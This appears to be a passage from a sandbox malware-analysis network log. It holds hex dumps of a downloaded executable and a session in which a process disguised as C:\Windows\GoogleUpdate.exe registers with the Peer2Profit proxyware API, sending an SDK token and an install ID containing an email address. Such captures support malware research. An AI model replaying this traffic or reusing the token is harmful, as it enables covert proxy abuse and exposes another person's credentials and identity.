2022-11-26 10:17:53 UTC	2160	IN	Data Raw: 70 ff ff ff 89 42 2c 8b 45 08 8b 40 34 89 42 34 8b 45 08 8b 95 70 ff ff ff 8b 75 b0 8b 40 30 89 42 30 8b 45 08 8b 95 6c ff ff ff c6 40 34 00 89 50 2c 8b 55 bc c7 40 30 00 00 00 00 8b 45 b8 8b 5e 24 21 c2 83 fa ff 74 15 8b 55 c8 8b 4d c0 01 d8 89 46 04 01 da 01 d9 89 4e 08 89 56 0c 8b 7d d0 8b 45 d4 21 f8 83 f8 ff 74 51 8b 4d e0 8b 45 d8 8b 55 dc 01 d9 01 fb 89 4e 18 b9 ff ff ff 7f 39 c1 b9 00 00 00 00 89 5e 10 19 d1 7d 29 8d 8b ff ff ff 7f 8d 76 00 05 01 00 00 80 bf ff ff ff 7f 89 cb 83 d2 ff 81 c1 ff ff ff 7f 39 c7 bf 00 00 00 00 19 d7 7c e0 01 d8 89 46 14 8b 55 08 8b 45 08 8b 52 28 8b 40 2c 89 d3 83 e2 10 83 e3 08 3b 85 6c ff ff ff 0f 84 8b 00 00 00 8b 75 08 8b 4e 34 01 c1 85 db 74 47 8b 75 08 89 46 0c 89 46 10 89 46 14 85 d2 74 09 89 46 1c 89 46 18 89 Data Ascii: pB,E@4B4Epu@0B0El@4P,U@0E^$!tUMFNV}E!tQMEUN9^})v9\|FUER(@,;luN4tGuFFFtFF
2022-11-26 10:17:53 UTC	2176	IN	Data Raw: 45 e0 f8 9e 63 00 89 6d e4 c7 45 e8 14 0b 62 00 89 65 ec e8 6f b7 f2 ff 8b 45 c0 8d 50 40 89 d1 89 55 b8 e8 df 62 00 00 8b 45 c0 31 d2 8b 4d b8 c7 80 b0 00 00 00 00 00 00 00 66 89 90 b4 00 00 00 c6 80 b6 00 00 00 00 c7 80 b8 00 00 00 00 00 00 00 c7 80 bc 00 00 00 00 00 00 00 c7 80 c0 00 00 00 00 00 00 00 c7 80 c4 00 00 00 00 00 00 00 c7 00 b8 50 65 00 c7 40 40 cc 50 65 00 c7 04 24 00 00 00 00 c7 45 c8 01 00 00 00 e8 37 85 00 00 8b 45 c0 8b 75 0c 83 ec 04 c7 00 30 97 65 00 8d 50 20 8d 48 04 83 ce 10 c7 40 40 44 97 65 00 c7 40 04 a8 9e 65 00 c7 40 08 00 00 00 00 c7 40 0c 00 00 00 00 c7 40 10 00 00 00 00 c7 40 14 00 00 00 00 c7 40 18 00 00 00 00 c7 40 1c 00 00 00 00 89 4d bc 89 d1 89 75 b4 89 55 b0 e8 07 3c fe ff 8b 45 08 8b 75 c0 8b 50 04 8b 00 8d 5e 30 c7 Data Ascii: EcmEbeoEP@UbE1MfPe@@Pe$E7Eu0eP H@@De@e@@@@@@MuU<EuP^0
2022-11-26 10:17:53 UTC	2192	IN	Data Raw: 00 00 5a e8 ab 08 de ff 8b 55 bc 84 c0 8b 45 bc 52 ba f6 59 00 00 5a 8b 52 0c 0f 45 50 08 51 b9 17 2a 00 00 59 50 b8 1b 15 00 00 b8 11 5b 00 00 b8 f1 61 00 00 b8 75 53 00 00 58 89 45 b8 89 55 bc e9 f8 fe ff ff 8b 4d b8 39 4d b4 74 1a 8b 45 c0 8b 51 10 8b 40 10 c7 45 c8 01 00 00 00 e8 50 08 de ff e9 8a 00 00 00 b0 01 e9 83 00 00 00 8b 45 cc 89 45 bc 8b 45 c8 51 b9 8e 07 00 00 59 85 c0 74 05 48 74 3d 0f 0b 8b 45 bc 89 04 24 eb 0f 1b 98 ac cc d6 20 c9 0b a9 fb 7a d0 97 6c b8 e8 93 f1 00 00 8b 45 c0 c7 44 24 04 20 00 00 00 89 04 24 e8 50 ef 00 00 c7 45 c8 02 00 00 00 e8 74 fe 00 00 c7 45 c8 00 00 00 00 eb 0f 1d 49 6e 2f 7d 6a a5 63 23 41 b3 64 b2 a8 e3 e8 27 f4 00 00 8b 45 bc c7 45 c8 ff ff ff ff 89 04 24 e8 55 7b f2 ff 8b 55 b4 8b 4d b8 0f b6 c0 52 ba 7a 3a Data Ascii: ZUERYZREPQ*YP[auSXEUM9MtEQ@EPEEEQYtHt=E$ zlED$ $PEtEIn/}jc#Ad'EE$U{UMRz:
2022-11-26 10:17:53 UTC	2208	IN	Data Raw: 43 10 85 c9 0f 84 ad 00 00 00 85 c2 0f 85 1e 01 00 00 83 c4 3c 89 d8 5b 5e 5f 5d c2 04 00 8d b4 26 00 00 00 00 66 90 3d ff ff ff 0f 0f 8f 0f 01 00 00 c1 e0 03 8d 6b 24 89 04 24 e8 d7 af 00 00 8b 4e 64 89 c2 83 e9 01 0f 88 8f fe ff ff 8d b4 26 00 00 00 00 66 90 83 e9 01 c7 00 00 00 00 00 83 c0 08 c7 40 fc 00 00 00 00 83 f9 ff 75 e8 e9 69 fe ff ff 8d 76 00 8b 7e 7c 85 ff 0f 84 ba 00 00 00 80 7f 1c 00 74 77 0f b6 57 3d 88 56 74 c6 46 75 01 80 7b 75 00 0f 85 0d ff ff ff 8b 7b 7c 85 ff 0f 84 94 00 00 00 80 7f 1c 00 74 19 c6 43 75 01 e9 f3 fe ff ff 83 ca 01 89 53 14 e9 48 ff ff ff 8d 74 26 00 90 89 f9 88 54 24 1c e8 25 23 f5 ff 8b 07 0f b6 54 24 1c 8b 40 18 3d d0 b0 57 00 74 cb c7 04 24 20 00 00 00 89 f9 ff d0 83 ec 04 0f b6 54 24 1c eb b6 8d b4 26 00 00 00 00 Data Ascii: C<[^_]&f=k$$Nd&f@uiv~\|twW=VtFu{u{\|tCuSHt&T$%#T$@=Wt$ T$&
2022-11-26 10:17:53 UTC	2224	IN	Data Raw: 44 24 34 90 4a 63 00 89 04 24 c7 44 24 38 fc 94 63 00 89 6c 24 3c c7 44 24 40 e8 ca 62 00 89 64 24 44 e8 60 f7 f1 ff 8b 44 24 70 8b 54 24 70 8d 4c 24 5c 8b 00 03 50 f4 89 d0 83 c0 6c 89 04 24 e8 92 7c fd ff 83 ec 04 8d 44 24 5c c7 44 24 20 01 00 00 00 89 04 24 e8 1b 23 00 00 8d 4c 24 5c 89 44 24 18 e8 0e 7e fd ff 8b 44 24 70 8b 54 24 70 8b 00 8b 40 f4 8b 54 02 78 89 54 24 14 8b 42 08 3b 42 0c 72 28 e9 bc 00 00 00 8d 74 26 00 0f b7 10 83 c0 02 89 41 08 66 83 fa ff 74 69 8b 54 24 14 8b 42 08 3b 42 0c 0f 83 99 00 00 00 0f b7 00 66 83 f8 ff 74 50 8b 4c 24 18 0f b7 c0 8b 11 89 44 24 04 c7 04 24 20 00 00 00 8b 42 08 c7 44 24 20 ff ff ff ff ff d0 83 ec 08 84 c0 74 4e 8b 4c 24 14 8b 41 08 3b 41 0c 72 a4 8b 4c 24 14 8b 01 8b 40 28 c7 44 24 20 ff ff ff ff ff d0 89 Data Ascii: D$4Jc$D$8cl$<D$@bd$D`D$pT$pL$\Pl$\|D$\D$ $#L$\D$~D$pT$p@TxT$B;Br(t&AftiT$B;BftPL$D$$ BD$ tNL$A;ArL$@(D$
2022-11-26 10:17:53 UTC	2240	IN	Data Raw: 89 01 8b 4d 10 8b 01 8b 4d 08 03 50 f4 c7 45 b8 01 00 00 00 89 14 24 e8 cb 1c f9 ff 8b 55 b0 8b 45 0c 83 ec 04 8b 4d 08 89 54 24 04 89 04 24 e8 d3 09 f9 ff 8b 45 10 83 ec 08 8b 4d 08 89 04 24 e8 a2 0a f9 ff 8d 45 b4 83 ec 04 89 04 24 e8 04 ba f1 ff 8b 45 08 c9 c3 8b 55 08 8b 45 bc 8b 0a 8d 55 f7 83 e9 0c 89 45 b0 89 14 24 e8 b6 04 f9 ff c7 45 b8 ff ff ff ff 50 8b 45 b0 89 04 24 e8 c3 bb f1 ff 90 90 90 55 89 e5 53 8d 45 b4 83 ec 64 c7 45 cc 90 4a 63 00 89 04 24 c7 45 d0 44 83 63 00 89 6d d4 c7 45 d8 a4 0a 63 00 89 65 dc e8 d3 b6 f1 ff 8b 45 0c 8b 00 8b 48 fc 85 c9 78 37 8d 50 fc f0 83 02 01 8b 5d 08 89 03 8b 45 10 89 d9 c7 45 b8 01 00 00 00 89 04 24 e8 07 0a f9 ff 8d 45 b4 83 ec 04 89 04 24 e8 69 b9 f1 ff 8b 45 08 8b 5d fc c9 c3 90 8d 58 f4 8d 45 f7 c7 44 Data Ascii: MMPE$UEMT$$EM$E$EUEUE$EPE$USEdEJc$EDcmEceEHx7P]EE$E$iE]XED
2022-11-26 10:17:53 UTC	2256	IN	Data Raw: 00 c7 44 24 30 00 00 00 00 01 da c7 44 24 34 00 00 00 00 8b 02 c7 44 24 38 00 00 00 00 c7 44 24 3c 10 00 00 00 39 48 fc 75 6d 8b 7c 24 54 8b 01 8d 74 24 2c 89 54 24 0c 89 74 24 18 89 7c 24 10 8b 7c 24 58 89 5c 24 14 89 7c 24 08 8b 7c 24 5c c7 44 24 04 06 00 00 00 89 3c 24 ff 50 1c 83 ec 1c 8b 54 24 2c 89 d0 85 d2 74 2c 8b 7c 24 38 89 f9 83 e1 06 83 f9 06 74 20 8b 4c 24 34 8b 74 24 30 21 ce 83 e6 06 83 fe 06 74 0e 83 e1 05 83 f9 04 74 04 85 ff 74 10 31 c0 83 c4 40 5b 5e 5f c3 8d b4 26 00 00 00 00 8b 4c 24 5c 85 c9 78 18 03 44 24 5c 39 c3 75 e0 89 d0 83 c4 40 5b 5e 5f c3 8d b4 26 00 00 00 00 83 7c 24 5c fe 74 c9 8b 44 24 58 8b 4c 24 58 8b 00 89 5c 24 0c 8b 5c 24 54 89 54 24 04 89 5c 24 08 8b 5c 24 5c 89 1c 24 ff 50 20 83 e0 06 83 ec 10 83 f8 06 75 9a 8b 54 Data Ascii: D$0D$4D$8D$<9Hum\|$Tt$,T$t$\|$\|$X\$\|$\|$\D$<$PT$,t,\|$8t L$4t$0!ttt1@[^_&L$\xD$\9u@[^_&\|$\tD$XL$X\$\$TT$\$\$\$P uT
2022-11-26 10:17:53 UTC	2272	IN	Data Raw: 00 00 00 00 00 00 00 ff 00 0d 01 02 00 01 01 00 00 00 00 00 00 00 00 ff 00 0d 01 02 00 01 01 00 00 00 00 00 00 00 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff 00 0d 01 02 00 01 01 00 00 00 00 00 00 00 00 ff ff 01 00 ff ff 01 00 ff ff 01 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff 00 0d 01 02 00 01 01 00 00 00 00 00 00 00 00 ff ff 01 00 ff ff 01 00 ff ff 01 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 04 00 00 01 00 ff ff 01 00 ff ff 01 02 00 00 ff ff 01 04 00 00 01 00 ff ff 01 00 ff ff 01 02 00 00 ff ff 01 04 00 00 01 00 ff ff 01 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 02 00 00 ff ff 01 04 00 00 01 00 ff ff 01 00 ff ff 01 02 00 00 ff ff 01 04 00 00 01 00 ff ff Data Ascii:
2022-11-26 10:17:53 UTC	2288	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-11-26 10:17:53 UTC	2304	IN	Data Raw: e4 40 00 28 e4 40 00 5a e4 40 00 5a e4 40 00 4f e4 40 00 77 e4 40 00 65 e4 40 00 fc e5 40 00 d4 e5 40 00 32 d8 40 00 31 da 40 00 69 e5 40 00 5e e5 40 00 53 e5 40 00 a2 e5 40 00 88 e5 40 00 7d e5 40 00 a2 e5 40 00 90 e5 40 00 a2 e5 40 00 90 e5 40 00 c9 e5 40 00 2d e6 40 00 20 e6 40 00 7b 0a 09 09 22 63 6f 6e 74 65 78 74 22 3a 7b 0a 09 09 20 20 20 22 63 6c 69 65 6e 74 22 3a 7b 0a 09 09 09 20 20 22 63 6c 69 65 6e 74 4e 61 6d 65 22 3a 2c 0a 09 09 09 20 20 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 22 3a 22 22 2c 0a 09 09 09 20 20 22 65 78 70 65 72 69 6d 65 6e 74 73 54 6f 6b 65 6e 22 3a 22 22 2c 0a 09 09 09 20 20 22 67 6c 22 3a 22 22 2c 0a 09 09 09 20 20 22 68 6c 22 3a 22 22 0a 09 09 20 20 20 7d 2c 0a 09 09 20 20 20 22 63 6c 69 65 6e 74 53 63 72 65 65 6e 4e 6f Data Ascii: @(@Z@Z@O@w@e@@@2@1@i@^@S@@@}@@@@@@-@ @{"context":{ "client":{ "clientName":, "clientVersion":"", "experimentsToken":"", "gl":"", "hl":"" }, "clientScreenNo
2022-11-26 10:17:54 UTC	2320	IN	Data Raw: 20 22 25 73 22 00 49 4e 53 45 52 54 20 49 4e 54 4f 20 25 51 2e 73 71 6c 69 74 65 5f 6d 61 73 74 65 72 20 56 41 4c 55 45 53 28 27 74 72 69 67 67 65 72 27 2c 25 51 2c 25 51 2c 30 2c 27 43 52 45 41 54 45 20 54 52 49 47 47 45 52 20 25 71 27 29 00 74 79 70 65 3d 27 74 72 69 67 67 65 72 27 20 41 4e 44 20 6e 61 6d 65 3d 27 25 71 27 00 74 65 6d 70 6f 72 61 72 79 20 74 72 69 67 67 65 72 20 6d 61 79 20 6e 6f 74 20 68 61 76 65 20 71 75 61 6c 69 66 69 65 64 20 6e 61 6d 65 00 63 61 6e 6e 6f 74 20 63 72 65 61 74 65 20 74 72 69 67 67 65 72 73 20 6f 6e 20 76 69 72 74 75 61 6c 20 74 61 62 6c 65 73 00 74 72 69 67 67 65 72 20 25 54 20 61 6c 72 65 61 64 79 20 65 78 69 73 74 73 00 63 61 6e 6e 6f 74 20 63 72 65 61 74 65 20 74 72 69 67 67 65 72 20 6f 6e 20 73 79 73 74 65 6d 20 Data Ascii: "%s"INSERT INTO %Q.sqlite_master VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')type='trigger' AND name='%q'temporary trigger may not have qualified namecannot create triggers on virtual tablestrigger %T already existscannot create trigger on system
2022-11-26 10:17:54 UTC	2336	IN	Data Raw: 4d 00 20 49 4e 54 00 20 52 45 41 4c 00 00 00 20 2f 64 00 80 9b 64 00 86 9b 64 00 8b 9b 64 00 90 9b 64 00 c4 47 64 00 08 00 00 00 21 00 20 00 1e 00 1c 00 1a 00 00 00 00 00 02 00 03 00 05 00 06 00 07 00 08 00 09 00 72 65 6e 61 6d 65 00 64 72 6f 70 20 63 6f 6c 75 6d 6e 00 61 64 64 20 63 6f 6c 75 6d 6e 00 00 00 d0 9b 64 00 d7 9b 64 00 e3 9b 64 00 06 00 00 00 00 00 00 00 02 04 08 06 52 45 4c 45 41 53 45 00 a7 59 64 00 08 9c 64 00 7c 59 64 00 61 64 64 72 00 6f 70 63 6f 64 65 00 70 31 00 70 32 00 70 33 00 70 34 00 70 35 00 63 6f 6d 6d 65 6e 74 00 69 64 00 70 61 72 65 6e 74 00 6e 6f 74 75 73 65 64 00 64 65 74 61 69 6c 00 00 00 00 00 00 00 00 00 1c 9c 64 00 21 9c 64 00 28 9c 64 00 2b 9c 64 00 2e 9c 64 00 31 9c 64 00 34 9c 64 00 37 9c 64 00 3f 9c 64 00 42 9c 64 00 Data Ascii: M INT REAL /dddddGd! renamedrop columnadd columndddRELEASEYdd\|Ydaddropcodep1p2p3p4p5commentidparentnotuseddetaild!d(d+d.d1d4d7d?dBd
2022-11-26 10:17:54 UTC	2352	IN	Data Raw: 05 4c 05 4a 05 49 05 6d 00 6d 00 cc 00 3c 06 d0 04 2e 02 09 01 da 00 6e 00 cd 00 bd 01 3a 02 39 02 9a 01 83 01 f9 03 fd 05 b3 00 3c 01 2f 02 f9 03 f9 03 fb 03 fc 03 1b 00 e6 00 fb 05 cd 04 4f 00 30 02 55 00 04 00 a2 01 d7 00 24 02 51 00 54 00 bc 00 7e 05 ad 00 b5 00 cd 01 c3 01 23 00 ce 01 33 02 b7 00 f9 03 f9 03 fb 03 fc 03 1b 00 b8 00 d3 05 b9 00 ba 00 ef 01 f2 00 62 00 8e 01 84 05 24 00 83 05 e4 01 5b 00 d5 01 91 01 86 05 bd 01 c0 00 c8 05 f6 00 de 05 ea 01 5a 01 15 01 f8 00 c4 00 ed 01 ff 01 2d 02 5e 01 e8 04 f9 00 fa 00 93 01 21 05 20 05 6f 00 30 02 b0 01 04 00 1f 05 18 05 5d 00 4b 06 73 03 4a 06 e0 00 94 01 b2 01 08 02 07 01 b3 01 2b 06 33 02 03 05 02 05 6c 01 03 04 32 01 01 05 08 01 49 06 1d 06 6d 00 6d 00 72 01 17 05 33 01 1c 06 b6 01 80 00 6e 00 Data Ascii: LJImm<.n:9</O0U$QT~#3b$[Z-^! o0]KsJ+3l2Immr3n
2022-11-26 10:17:54 UTC	2368	IN	Data Raw: 67 3a 3a 61 70 70 65 6e 64 00 3a 20 00 2f 00 5c 00 00 00 62 61 73 69 63 5f 73 74 72 69 6e 67 5f 76 69 65 77 3a 3a 73 75 62 73 74 72 00 00 00 25 73 3a 20 5f 5f 70 6f 73 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 20 3e 20 5f 5f 73 69 7a 65 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 65 72 61 73 65 00 00 00 00 25 73 3a 20 5f 5f 70 6f 73 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 20 3e 20 74 68 69 73 2d 3e 73 69 7a 65 28 29 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 00 00 e4 11 5d 00 b6 11 5d 00 dc 11 5d 00 93 11 5d 00 03 12 5d 00 8b 11 5d 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 73 75 62 73 74 72 00 00 00 00 0d 3d 5d 00 35 3d 5d 00 3f 3d 5d 00 94 3d 5d 00 d4 3d 5d 00 25 3d 5d 00 fd 3c 5d 00 cf 1d 5d 00 Data Ascii: g::append: /\basic_string_view::substr%s: __pos (which is %zu) > __size (which is %zu)basic_string::erase%s: __pos (which is %zu) > this->size() (which is %zu)]]]]]]basic_string::substr=]5=]?=]=]=]%=]<]]
2022-11-26 10:17:54 UTC	2384	IN	Data Raw: 8c 65 00 28 78 65 00 80 61 65 00 14 8c 65 00 38 78 65 00 70 5c 65 00 d4 8b 65 00 48 78 65 00 14 8c 65 00 5c 78 65 00 dc 5f 65 00 14 8c 65 00 70 78 65 00 fc 5f 65 00 14 8c 65 00 84 78 65 00 88 5b 65 00 14 8c 65 00 98 78 65 00 88 5b 65 00 14 8c 65 00 ac 78 65 00 88 5b 65 00 14 8c 65 00 c0 78 65 00 70 5c 65 00 08 a2 65 00 d4 78 65 00 64 5a 65 00 14 8c 65 00 e8 78 65 00 80 61 65 00 14 8c 65 00 00 79 65 00 08 5d 65 00 14 8c 65 00 40 79 65 00 10 5d 65 00 14 8c 65 00 80 79 65 00 7c 5a 65 00 14 8c 65 00 c0 79 65 00 94 5c 65 00 40 8c 65 00 00 7a 65 00 00 00 00 00 01 00 00 00 74 61 65 00 03 f4 ff ff 40 8c 65 00 40 7a 65 00 00 00 00 00 01 00 00 00 74 61 65 00 03 f4 ff ff d4 8b 65 00 80 7a 65 00 14 8c 65 00 94 7a 65 00 80 61 65 00 14 8c 65 00 c0 7a 65 00 9c 5a 65 00 Data Ascii: e(xeaee8xep\eeHxee\xe_eepxe_eexe[eexe[eexe[eexep\eexedZeexeaeeye]ee@ye]eeye\|Zeeye\e@ezetae@e@zetaeezeezeaeezeZe
2022-11-26 10:17:54 UTC	2400	IN	Data Raw: 5c 65 00 60 34 5e 00 b0 33 5e 00 90 1b 5e 00 70 1d 5e 00 d0 21 5e 00 30 24 5e 00 a0 19 5e 00 f0 28 5e 00 d0 1d 5e 00 80 29 5e 00 70 83 5f 00 c0 27 5e 00 f0 1f 5e 00 60 25 5e 00 00 00 00 00 14 5c 65 00 c0 59 5e 00 10 59 5e 00 00 41 5e 00 e0 42 5e 00 20 47 5e 00 90 49 5e 00 10 3f 5e 00 40 4e 5e 00 40 43 5e 00 d0 4e 5e 00 a0 8d 5f 00 10 4d 5e 00 40 45 5e 00 c0 4a 5e 00 74 00 00 00 00 00 00 00 20 5c 65 00 40 71 5e 00 50 70 5e 00 6c 00 00 00 f8 ff ff ff 20 5c 65 00 a0 20 63 00 a0 1f 63 00 8c ff ff ff 8c ff ff ff 20 5c 65 00 d0 27 63 00 d0 26 63 00 78 00 00 00 00 00 00 00 2c 5c 65 00 60 89 5e 00 70 88 5e 00 70 00 00 00 f8 ff ff ff 2c 5c 65 00 80 22 63 00 80 21 63 00 88 ff ff ff 88 ff ff ff 2c 5c 65 00 c0 29 63 00 c0 28 63 00 08 00 00 00 00 00 00 00 38 5c 65 00 Data Ascii: \e`4^3^^p^!^0$^^(^^)^p_'^^`%^\eY^Y^A^B^ G^I^?^@N^@C^N^_M^@E^J^t \e@q^Pp^l \e cc \e'c&cx,\e`^p^p,\e"c!c,\e)c(c8\e
2022-11-26 10:17:54 UTC	2416	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 18 00 00 00 18 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 30 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 48 00 00 00 58 20 26 00 8f 04 00 00 00 00 00 00 00 00 00 00 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d Data Ascii: 0HX &<?xml version="1.0" encoding="UTF-8" standalone=
2022-11-26 10:17:54 UTC	2432	IN	Data Raw: 20 1b 00 30 00 00 00 21 32 d7 32 f7 32 36 33 17 34 37 34 76 34 c6 35 e6 35 32 36 b2 36 32 37 86 38 a6 38 f2 38 62 39 e2 39 56 3a 5c 3f 00 00 00 30 1b 00 14 00 00 00 d8 39 93 3a d9 3a c6 3b f8 3f 00 00 00 40 1b 00 1c 00 00 00 42 34 4f 34 6c 34 79 34 64 35 71 35 c4 3d 21 3e 84 3e 00 00 00 50 1b 00 10 00 00 00 16 31 23 35 e3 36 a6 37 00 60 1b 00 0c 00 00 00 c7 38 7b 3e 00 70 1b 00 14 00 00 00 ee 33 f9 33 bb 36 c6 36 c8 3a d3 3a 00 80 1b 00 10 00 00 00 8f 3c cf 3c d4 3d fa 3f 00 90 1b 00 20 00 00 00 31 33 e3 33 60 34 ac 34 91 36 b0 36 ba 36 c4 36 e9 36 fc 37 2a 39 00 00 00 a0 1b 00 18 00 00 00 07 34 e0 36 ea 36 f4 36 19 37 2c 38 5a 39 00 00 00 b0 1b 00 24 00 00 00 3a 34 1b 37 22 37 2c 37 30 38 88 39 8f 39 99 39 d0 3a da 3a e4 3a 09 3b 1f 3c 00 00 00 c0 1b 00 Data Ascii: 0!22263474v45526627888b99V:\?09::;?@B4O4l4y4d5q5=!>>P1#567`8{>p3366::<<=? 133`44666667*946667,8Z9$:47"7,708999:::;<
2022-11-26 10:17:54 UTC	2448	IN	Data Raw: 38 74 38 7c 38 80 38 88 38 8c 38 94 38 98 38 a0 38 a4 38 ac 38 b0 38 b8 38 bc 38 c4 38 c8 38 d0 38 d4 38 dc 38 e0 38 e8 38 ec 38 f4 38 f8 38 00 39 04 39 0c 39 10 39 18 39 1c 39 24 39 28 39 30 39 34 39 3c 39 40 39 48 39 54 39 58 39 60 39 64 39 6c 39 78 39 84 39 90 39 9c 39 a8 39 b4 39 c0 39 c4 39 cc 39 d0 39 d8 39 dc 39 e4 39 f0 39 fc 39 08 3a 14 3a 18 3a 90 3b 94 3b 98 3b 9c 3b a0 3b a4 3b e0 3c 7c 3d 80 3d 84 3d 88 3d 8c 3d 90 3d 94 3d 98 3d 9c 3d f8 3e fc 3e 00 d0 23 00 0c 00 00 00 cc 3b d0 3b 00 e0 23 00 48 00 00 00 80 30 84 30 88 30 60 31 64 31 68 31 6c 31 70 31 74 31 78 31 7c 31 80 31 84 31 88 31 8c 31 90 31 94 31 a0 31 a4 31 a8 31 ac 31 b0 31 b4 31 b8 31 bc 31 c0 31 c4 31 c8 31 cc 31 d0 31 d4 31 cc 37 00 00 24 00 88 00 00 00 b4 32 b8 32 bc 32 c0 32 Data Ascii: 8t8\|8888888888888888888888999999$9(90949<9@9H9T9X9`9d9l9x999999999999999:::;;;;;;<\|=========>>#;;#H000`1d1h1l1p1t1x1\|1111111111111111111117$2222
2022-11-26 10:17:54 UTC	2464	IN	Data Raw: 87 2d e4 fc 02 d6 3e 77 04 bc 04 36 b5 e7 77 cb 9c 2e 8d 23 18 b9 a3 c2 47 1d f0 5d d6 a1 73 57 05 68 9a a7 c9 37 65 1d be ea bc d8 42 83 43 05 a5 8b a6 09 ff d1 a1 94 a6 4e aa 3d 09 f5 05 6c b7 d2 64 5a d8 2a 22 c2 4b 9d f1 39 5e 4c de 48 3d 9b 34 96 9a 09 5f 8e fd f7 b1 52 91 ce 3f 89 f6 1c a1 b5 a9 75 1f 71 bf 5b 43 5d 65 3d 50 81 6e ab f0 d0 d3 fc b2 b3 1f b6 99 96 26 f4 3c 79 8b 5c 64 cc cd ee 27 9a e5 a0 c0 0c 72 87 c1 6e 4d 5a d3 1e ea f0 44 e6 32 6f 1c eb 17 4e 94 c3 78 65 20 3b 0f 41 aa 1f e9 a1 41 9d fe b1 b8 a0 65 2a 34 e0 de a8 f9 3c e6 c1 30 bb c0 a0 63 2c fc 5c 16 00 a8 d0 c4 7f ea 11 9d 1e 06 c6 a6 6d 32 5d b4 38 09 2b 49 07 aa fd ec 30 da f1 a7 2f cf b7 fd fa d0 a3 84 d9 27 9e fb 01 66 77 b9 56 10 e1 20 6e c6 ae b1 f9 b6 ba c8 35 5d 33 76 Data Ascii: ->w6w.#G]sWh7eBCN=ldZ"K9^LH=4_R?uq[C]e=Pn&<y\d'rnMZD2oNxe ;AAe4<0c,\m2]8+I0/'fwV n5]3v

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49737	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:20 UTC	2473	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:20 UTC	2473	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:20 UTC	2473	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:20 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e124dac79b9b-FRA
